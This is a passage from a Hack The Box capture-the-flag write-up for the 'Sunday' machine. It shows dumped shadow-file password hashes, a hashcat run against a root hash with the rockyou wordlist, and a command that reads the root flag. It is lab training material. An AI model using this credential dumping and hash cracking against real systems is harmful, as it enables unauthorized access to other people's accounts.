postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
Hashcat root hash
root@kali:~/HTB/Machines/Sunday# echo '$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD' >> hash.txt
root@kali:~/HTB/Machines/Sunday# hashcat --force -m 7400 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2048/5878 MB allocatable, 8MCU

Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

INFO: Removed 1 hash found in potfile.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=8 -D KERN_TYPE=7400 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
I gave up on this solution; I need a cracking machine for this...
Root flag
root@sunday:/backup# cat /root/root.txt <ROOT_FLAG>
Daniel Simao 21:51, 29 November 2019 (EST)